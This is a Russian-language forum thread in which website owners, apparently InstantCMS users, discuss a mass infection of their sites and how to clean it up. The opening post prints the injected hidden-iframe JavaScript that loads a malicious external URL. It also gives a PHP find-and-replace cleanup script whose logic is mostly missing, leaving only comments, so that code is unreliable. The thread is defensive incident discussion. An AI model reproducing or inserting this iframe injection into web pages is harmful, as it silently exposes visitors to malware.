Уважаемые друзья! К сожалению мне сейчас не до поздравлений. Да и настроение резко перестало быть праздничным. Все мои сайты, а так же знакомых сегодня быле жестоко заражены гадским трояном с адресом http:// nypmivhy.ru /count5.php НЕ советую по нему переходить. Сайты никак не взаимосвязанны, сторонних компонентов на некоторых вообще нет. Обидно, словами не пересказать.
Да и все на глазах происходило. Файлы изменялись в размере и в них прописывался кодПоскольку коснулось не только моих сайтов, значит атака массовая. Не хочется истерить, но подозреваю что жертв на будет больше. Господа, давайте искать уязвимость, раз она уже нашла нас!
П.С.
После изучения логов и размышлений пришел к выводу что был банально стащен пароль к фтп с FileZilla, так как пользуюсь только єтой программой. Хотя к чужому сайту я пароля не имел, он тоже пользуется этой программой.
Вылечил сайт скриптом с заменой текста
Это для скриптов, для всех прочих файлов немного изменил значение $text — просто скопровал с зараженного файла шаблона
Да и все на глазах происходило. Файлы изменялись в размере и в них прописывался код
<!--04b037--><script type="text/javascript" language="javascript">(function () { var ipexz = document.createElement('iframe'); ipexz.src = 'http://nypmivhy.ru/count5.php'; ipexz.style.position = 'absolute'; ipexz.style.border = '0'; ipexz.style.height = '1px'; ipexz.style.width = '1px'; ipexz.style.left = '1px'; ipexz.style.top = '1px'; if (!document.getElementById('ipexz')) { document.write('<div id=\'ipexz\'></div>'); document.getElementById('ipexz').appendChild(ipexz); }})();</script><!--/04b037-->
П.С.
После изучения логов и размышлений пришел к выводу что был банально стащен пароль к фтп с FileZilla, так как пользуюсь только єтой программой. Хотя к чужому сайту я пароля не имел, он тоже пользуется этой программой.
Вылечил сайт скриптом с заменой текста
<?php function scan_dir($dirname) { // Объявляем переменные замены глобальными GLOBAL $text, $retext; // Открываем текущую директорию // Читаем в цикле директорию { // Если файл обрабатываем его содержимое if($file != "." && $file != "..") { // Если имеем дело с файлом - производим в нём замену { // Читаем содержимое файла // Осуществляем замену // Перезаписываем файл } // Если перед нами директория, вызываем рекурсивно // функцию scan_dir { echo $dirname."/".$file." "; scan_dir($dirname."/".$file); } } } // Закрываем директорию } $text = "(function () { var gqiam = document.createElement('iframe'); gqiam.src = 'http://nypmivhy.ru/count5.php'; gqiam.style.position = 'absolute'; gqiam.style.border = '0'; gqiam.style.height = '1px'; gqiam.style.width = '1px'; gqiam.style.left = '1px'; gqiam.style.top = '1px'; if (!document.getElementById('gqiam')) { document.write('<div id=\'gqiam\'></div>'); document.getElementById('gqiam').appendChild(gqiam); }})();"; // Искомая строка $retext = ' '; // Строка замены $dirname = "."; scan_dir($dirname); // Вызов рекурсивной функции ?>
$text = "<!--04b037--><script type=\"text/javascript\" language=\"javascript\" > (function () { var ipexz = document.createElement('iframe'); ipexz.src = 'http://nypmivhy.ru/count5.php'; ipexz.style.position = 'absolute'; ipexz.style.border = '0'; ipexz.style.height = '1px'; ipexz.style.width = '1px'; ipexz.style.left = '1px'; ipexz.style.top = '1px'; if (!document.getElementById('ipexz')) { document.write('<div id=\'ipexz\'></div>'); document.getElementById('ipexz').appendChild(ipexz); }})();</script><!--/04b037-->";
Реклама #
Игорь Филиппов 11 лет назад #
deltas 11 лет назад #
Suslik 11 лет назад #
http://seosmm.net/blogs/seo/molitvoslov.html
взломали в тоже самое время что и у вас, очень интересное совпадение - то есть возможно виндовс вирус
Александр 11 лет назад #
Николай (asd43) 11 лет назад #
Алексей Т 11 лет назад #
fact 11 лет назад #
letsgo 11 лет назад #
Николай (asd43) 11 лет назад #
Cruzka 11 лет назад #
Сайты на инстанте? Версия 10 или 10.1?
fact 11 лет назад #
deltas 11 лет назад #
Cruzka 11 лет назад #
letsgo 11 лет назад #
fact 11 лет назад #
deltas 11 лет назад #
Андрей Кравченко 11 лет назад #
fact 11 лет назад #
letsgo 11 лет назад #
Зашел в аккаунт Беларуса)
fact 11 лет назад #
Cruzka 11 лет назад #
Александр 11 лет назад #
deltas 11 лет назад #
Cruzka 11 лет назад #
letsgo 11 лет назад #
Def 11 лет назад #
Коля 11 лет назад #
У кого нибудь кто не является разработчиком дополнений для инстант еще взломали сайт ?
Cruzka 11 лет назад #
что-то типа
foreach ($sites in $site_list){
//применяем однотипную атаку, заражая одни и те же файлы
}
Заражённые, вы сайты светили где-нибудь, в связанном с инстантом? Каталоги ресурсов на инстант, подписи на форуме?
deltas 11 лет назад #
r2 11 лет назад #
да и таким перебором ее вряд ли можно было эксплуатировать
deltas 11 лет назад #
1. почистить все компы с доступом к сайту.
2. сменить пассы на фтп, админку
Есть такая бесплатная прога MassTextProcessor (MTP). Ею можно поменять один и тот же текст сразу во всех файлах.
Скачиваете свой сайт на комп, запускаете МТР, указываете каталог с файлами сайта.
В обработке указываете код вашего трояна в качестве исходного текста, заменить на то что в кавычка TEXT="", т.е. удалить. Запускаете и прога сама выкинет везде вредоносный код.
Теперь можно заливать файлы обратно на хост.
fact 11 лет назад #
тут врят ли так просто можно надолго избавиться от заразы, как то много заражённых резко появилось за сутки
letsgo 11 лет назад #
deltas 11 лет назад #
deltas 11 лет назад #
st.Puh 11 лет назад #
deltas 11 лет назад #
потом сменил значение $text на другое, сохранил и опять зашел. Скрипт проходится по всем файлам и удаляет вредоносный код. Конечно код может быть у всех разный, так что лучше скопировать из зараженного файла.
Код заражения разный в файлах .htaccess , js-скриптах и во всех других файлах.
fact 11 лет назад #
deltas 11 лет назад #
Cruzka 11 лет назад #
Николай (asd43) 11 лет назад #
Dim@sik 11 лет назад #
deltas 11 лет назад #
AndroS 11 лет назад #
stavpit 11 лет назад #
Evgenii 11 лет назад #
прописывался код в .htaccess и template пока больше не нашол, самое интересное - код убираю, меняю все пароли а через час все опять на месте...
universe 11 лет назад #
stavpit 11 лет назад #
Ramin 11 лет назад #
RIM5 11 лет назад #
Данная проблема наблюдалась при установке данного модуля.
letsgo 11 лет назад #
Майкл 11 лет назад #
http://instantcms.ru/blogs/moe-hobi/novogodnie-snezhinki.html
letsgo 11 лет назад #
Evgenii 11 лет назад #
Май 11 лет назад #
RIM5 11 лет назад #
Я говорю, что данная проблема возникает у людей, использующих виджеты с сайта "101виджет". А данный модуль именно это и использует.
Май, какой у Вас антивирус? Киньте ссылку на страницу, где данный модуль стоит.
Сколько сайтов пересмотрел, везде где эти виджеты, везде антивирусник матерится.
Май 11 лет назад #
nedoriko 11 лет назад #
а вот результаты онлайн проверки
доктор вебом
как видите проблем нет
Димитриус 11 лет назад #
Николай (asd43) 11 лет назад #
RIM5 11 лет назад #
Ше 11 лет назад #
Какая версия, какой хостинг, какие модули и плагины добавлял?
Майкл 11 лет назад #
Разбираются люди, вот уже и подозреваемый модуль появился.
Anonim 11 лет назад #
picaboo 11 лет назад #
Патчи ставить надо обязательно и сразу, поскольку по внесенным изменениям в дистриб, можно увидеть где было слабое место.
Димитриус 11 лет назад #
Еще интересно, когда по времени и дате это произошло.
Николай (asd43) 11 лет назад #
IRATE 11 лет назад #
Pasha 11 лет назад #
2. Перед выкладыванием в массы скрипт был вычитан от первой до последней строки. Ничего левого в нем нет, чистая математика.
3. Ищите истинную причину.
AlexandrA 11 лет назад #
Димаха 11 лет назад #
Trang 11 лет назад #
st.Puh 11 лет назад #
Fuze 11 лет назад #
Все просто: есть последняя стабильная версия 1.10.1. Если есть подозрение, что взлом прошел через саму CMS, а так же если все рекомендации по безопасности выполнены (банально права на файлы выставлены верно), то
По данной теме мое личное мнение:
если в системные файлы движка был записан вредоносный код, то
- права на файлы и директории небезопасные;
- утащили доступы на хостинг;
- версия системы менее 1.10.1.
letsgo 11 лет назад #
Взлом думаю произошел из за сайта 101виджет. Поменьше ставьте чужих скриптов и все будет хорошо. Думаю вины системы в этом нет.
deltas 11 лет назад #
Fuze 11 лет назад #
p.s. deltas, к вам в огород камни не кидал просто в целом написал.
letsgo 11 лет назад #
Fuze 11 лет назад #
я тут недавно зашел на один варезный сайт instantcms и сам чуть было не "попал", благо имею привычку отключать все плагины и т.п. в браузере перед заходом...
я конечно все понимаю, что перед тем как сообщать о взломе ни кто не признается в том, что ищет и использует нуллы, но знайте, что:
- авторы нуллов не робин гуды;
- их главная задача - заработать любыми способами.
выводы делайте сами.
p.s. это я для общей информации не конкретно кому-то.
deltas 11 лет назад #
deltas 11 лет назад #
lezginka.ru 11 лет назад #
у FileZilla есть одна фигня, при всей хвалебности - сохраняет пароли без спроса :(
у тотал такого нет. делаем выводы :)
googlebot 11 лет назад #
Марат 11 лет назад #
На хосте сайты раскиданы по разным пользователям unix, права стоят нужные. По фтп захожу только сам, через Тотал Коммандер. Пароли не сохранены, каждый раз вбиваю по новой. На локальном компе стоит лицензионный Касперский.
Причина взломов, думаю, всё же в фтп клиентах.
А кто-то хотел ещё для root-а фтп доступ установить.
garry 11 лет назад #
Отсюда вывод, новогодние праздники у админов хостинга будут не веселые. И инстант тут не причем.
garry 11 лет назад #
deltas 11 лет назад #
Коля 11 лет назад #
Последняя рассылка на дле:
st.Puh 11 лет назад #
Saw 11 лет назад #
deltas 11 лет назад #
Коля 11 лет назад #
BlondinkO 11 лет назад #
Николай (asd43) 11 лет назад #
ALreD 11 лет назад #
Да, есть такая проблема! Но дело не в FileZilla а в сохранении паролей в виндосе... Подчеркиваю, проблема в Винде! Сам так потерял 2 сайта в прошлом году на Битриксе... Так как много лет живу уже на МАС OS, немного ослабился контроль и рефлексы. ПРишлось неделю админить сайты на винде (чужой ноут...) и вот что приключилось! С тех пор кроме как из моей любимой MAC в админки и на ФТП не хожу... И всем советую))) Всех с праздником, сочуствую пострадавшим...
IRATE 11 лет назад #
IRATE 11 лет назад #
ALreD 11 лет назад #
ALreD 11 лет назад #
IRATE 11 лет назад #
Нил™ 11 лет назад #
За сигнал спасибо. Желаю всем поскорей избавиться от заразы...
Александр 11 лет назад #
picaboo 11 лет назад #
Dost 11 лет назад #
Александр 11 лет назад #
r2 11 лет назад #
Троян увел у человека сохраненные пароли (которые, к слову, никогда нельзя сохранять).
И как же, по-вашему, эта ужасная администрация должна реагировать?
Александр 11 лет назад #
Ну со мной то ладно я знаю как лечить и сейчас это уже делаю, но многим другим вообще не будет ясно что делать. Как минимум админы должны были НОРМАЛЬНО для разного уровня пользователей написать по пунктам что и как делать, как чистить и.т.д. КАК ЗАПУСКАТЬ СКРПИТ и вообще работает ли он.
И что Вы всегда так болезненно реагируете на то что кто то Вас не хвалит, учитесь выслушивать и тех кто не льет варенье в уши.
Александр 11 лет назад #
r2 11 лет назад #
Затем пройтись автозаменой - см. инструкцию в комментарии ниже.
omarov 11 лет назад #
r2 11 лет назад #
http://stackoverflow.com/questions/14097982/javascript-code-added-to-server-page-automatically
r2 11 лет назад #
Народ ловит трояны, а виноваты злые админы, так получается? Не смешите, пожалуйста.
Когда есть уязвимости в движке всегда выходят патчи без всяких вопросов, все об этом знают.
Вы хотели бы услышать подробную инструкцию как удалить одинаковый текст из нескольких файлов?
Без обид, но это же операция уровня "начальный пользователь ПК".
Окей, вот инструкция:
1. Берем любую программу, поддерживающую поиск по нескольким файлам
2. В поле "Найти" вносим вражеский код, в поле "Заменить на" - пустую строку
3. Производим замену.
И да, я болезненно реагирую на необоснованные претензии вроде вашей.
Александр Корн 11 лет назад #
Теперь по поводу описания лечения от разработчиков... Если они будут писать способы лечения от всех зараз, которые могут подцепить неопытные и невнимательные пользователи, то им (разработчикам) придется забросить дальнейшее развитие системы!
Вы неправы ИМХО
Игорь Филиппов 11 лет назад #
r2 11 лет назад #
Игорь Филиппов 11 лет назад #
BlondinkO 11 лет назад #
IRATE 11 лет назад #
Владимир 11 лет назад #
Игорь Филиппов 11 лет назад #
AlLar 11 лет назад #
Всех с Наступающим!
Вопрос: а templateinstant.ru не иза этого закрылся?, а то зделал заказ на новый год, а там дела...
Апокалипсис пережили - и это всё переживём!
Всем удачи, любви и счастья!!!
Денис Васильевич 11 лет назад #
IRATE 11 лет назад #
IRATE 11 лет назад #
Денис Васильевич 11 лет назад #
ежели на клиентском пк стоит антивирус и файрвол то варез тут не причем.
сначала заражается клиентский пк а после файлы редактируемые через эту систему.
что же до прямого заражения на сервере то тут нужно соблюдать права на запись.
троян не действует в избирательном порядке, не выбирает скрипт для заражения.
IRATE 11 лет назад #
IRATE 11 лет назад #
garry 11 лет назад #
Никогда не слышали о активизации всевозможной гадости перед НГ, дабы траф украденный более продуктивно использовать.
Да за эти несколько дней "сломано" десятки тысяч сайтов. Причем на многих шеллы залиты не вчера и просто ждали своего часа. таким образом открыто море хостингов и сайтов.
Аааааааааа караул блин, пипец все пропало!!!!!!!!!!
Архивы залили права поменяли, пароли свежие и все, "взлома" нет.
Или вам базы потерли и сайты посносили, на серваках потерли бекапы и сожгли процы?
Ну не бывает такого что бы не было внимания к набирающим и популярным системам. Причем в данном случаи, то что я смотрел вина, если так можно сказать, хостеров в одном случаи и вина админа в другом(троян).
И на будущие, смотрите логи постоянно как только сайт становится боле менее популярным и будите удивлены сколько сотен раз в день вас пытаются отыметь, иньекции причем самый безобидный способ.
Но в любом случаи админов икмс срочно наказать, желательно подать жалобу в Гаагский трибунал!!!
Но лучше у кого есть знакомство в консульстве Китая, поговорите что бы им дали быстренько гражданство и тогда можно будет и к расстрелу подвести. Как минимум пожизненное!
С Новым Годом, берегите нервы, все будет проще, Со свежим бекапом Вас!!!
Fuze 11 лет назад #
Спокойней, господа. Уже всем ясно, что InstantCMS здесь не при чем. Любой версии, даже 1.0 ))
И в очередной раз, я надеюсь, все убедились, что безопасности много быть не может и самое главное - безопасность ВАШЕГО сервера зависит от только от ВАС.
С наступающим Новым Годом!
Игорь Филиппов 11 лет назад #
Cruzka 11 лет назад #
С наступающим!
Майкл 11 лет назад #
Для себя сделал вывод, что паника страшная штука.
Давайте в дальнейшем к подобным вещам относится с холодным сердцем и трезвым умом.
Всех поздравляю с наступающим новым годом! Остались считанные часы. )))
nikolas 11 лет назад #
Уходит Старый Год
p.s. Берегите нервы.... InstantCMS тут не причем....ик ))))Шуршит его последняя страница
Пусть лучшее.что было-не уйдёт,
А худшее-не сможет повториться!
Пусть щедрым будет Новый год!
Пусть он на счастье не скупится,
Пусть зажигает звёзды в срок
ЧТОБ ВСЕМ ЖЕЛАНИЯМ СБЫТЬСЯ!
Azura 11 лет назад #
RSN 11 лет назад #
И так всегда, что бы это было уже на рефлекторном...
Пароли только на время соединений. Остальное время на флешке. Вставил флешку скопировал пароль, подключился, работу закончил... дальше как писал выше.
Cruzka 11 лет назад #
SEOrigin 11 лет назад #
oll 11 лет назад #
Свежая подляна.В поиске не светиться. Это данные домена
по http://nic.ru/whois/?query=nypmivhy.ru
picaboo 11 лет назад #
ns1.newrect.com. [115.144.16.10] [TTL=172800]
ns2.newrect.com. [60.250.95.1] [TTL=172800]
ns3.newrect.com. [109.162.123.232] [TTL=172800]
ns4.newrect.com. [175.181.119.52] [TTL=172800]
ns5.newrect.com. [219.85.175.131] [TTL=172800]
ns6.newrect.com. [50.140.73.80] [TTL=172800]
но! при этом поскольку партнерки ставятся вполне конкретные и с идентификатором, при желании поймать гада можно. нужно лишь дождаться выплаты с партнерки и начать отслеживать цепочку по которой он будет деньги выводить. но это уже дело тех кому этим совершенно не интересно заниматься :(
Димитриус 11 лет назад #
picaboo 11 лет назад #
поорали на форуме, бекап откатили и сидят дальше.
Azura 11 лет назад #
deltas 11 лет назад #
picaboo 11 лет назад #
я про остальных, уровень высказываемых претензий которых, дает право сделать выводы о том что я выше написал.
Владимир Савенко ✝️ 11 лет назад #
hydraq 11 лет назад #
Полет нормальный
Стоит модуль снежинок
fotpod 11 лет назад #
Керя 11 лет назад #
Керя 11 лет назад #
ukrtop 11 лет назад #
Коля 11 лет назад #
ukrtop 11 лет назад #
Владимир Савенко ✝️ 11 лет назад #
БилàРиус # 31 декабря 2012 в 16:44
Закрыл сайт до выяснения обстоятельств
[Ответить]
ukrtop 11 лет назад #
Man 11 лет назад #
Сегодня вернулся из отпуска и обнаружил, что 8 сайтов, находящиеся на одном хостинге, не работают.
По статистике посмотрел, что 29 декабря трафик перестал поступать на сайты.
Обратился к хостеру и получил вот такой ответ:
1. Ваш компьютер (либо какой-либо другой, с которого вы подключались к хостинг-аккаунту по FTP, панели управления или личному кабинету) заражен вирусами.
2. Дырки в скриптах (в движке/CMS или даже каком-либо их плагине)
Проверяйте и п.1 и п.2. Пароль на ваш хостинг-аккаунт сменен (новый пароль придет вам в автоматическом уведомлении на эл.почту). Новый пароль используйте только после проверки п.1
FTP клиентами не пользуюсь.
Закачал только что DR. WEB CUREIT и обнаружил троян.
Версия движка 1.9. Переходить на 1.10 пока не стал, т.к. стоит куча хаков и не хочется потерять проделанную работу.
Это первый взлом моих сайтов и действительно странно, что в один и тот же день полетело такое количество сайтов на Инстанте.
dontstop 11 лет назад #
на самом деле странно очень это все..даже если это увод паролей от фтп, то почему массово пострадали сайты на яцмс?...
letsgo 11 лет назад #
dontstop 11 лет назад #
Kreator 11 лет назад #
возможно когда-то кто-то знающий толк в правах выложит инструкцию в блоге
dontstop 11 лет назад #
deltas 11 лет назад #
r2 11 лет назад #
Причина давно известна - виндовый троян.
deltas 11 лет назад #
видимо они размножаются :(
letsgo 11 лет назад #
nedoriko 11 лет назад #
- чьи партнерки рекламные у вас на сайте есть?
если есть.
Man 11 лет назад #
wils 11 лет назад #
RSN 11 лет назад #
Насчет FTP, может конечно, но хоть бы кто выложил тогда название вируса который он обнаружил на своем компе. Раз пароли от ФТП уводят, их же должно что то уводить... А так получается сами что ли ушли...
У меня 6 лет назад сайт через ФТП был заражен, так там четко два антивирусника и каспер и НОД (причем тогда еще не лицензионные) показали трояна, причем того который по базам антивирусников и занимается именно воровством данных.
deltas 11 лет назад #
Эдька 11 лет назад #
Май 11 лет назад #
Harconen 11 лет назад #
picaboo 11 лет назад #
IRATE 11 лет назад #
Май 11 лет назад #
IRATE 11 лет назад #
Harconen 11 лет назад #
Harconen 11 лет назад #
Harconen 11 лет назад #
IRATE 11 лет назад #
IRATE 11 лет назад #
Harconen 11 лет назад #
IRATE 11 лет назад #
Harconen 11 лет назад #
max molotov 11 лет назад #